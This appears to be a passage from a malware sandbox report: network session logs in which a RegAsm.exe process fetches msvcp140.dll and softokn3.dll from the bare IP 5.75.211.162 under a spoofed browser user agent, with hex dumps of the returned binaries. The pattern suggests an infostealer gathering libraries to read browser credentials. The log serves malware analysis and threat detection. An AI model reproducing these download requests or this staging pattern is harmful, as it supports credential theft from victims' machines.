2024-09-26 20:56:40 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:41 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:42 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:42 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:42 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:42 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 20:56:42 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:43 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:44 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:43 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:43 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:44 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
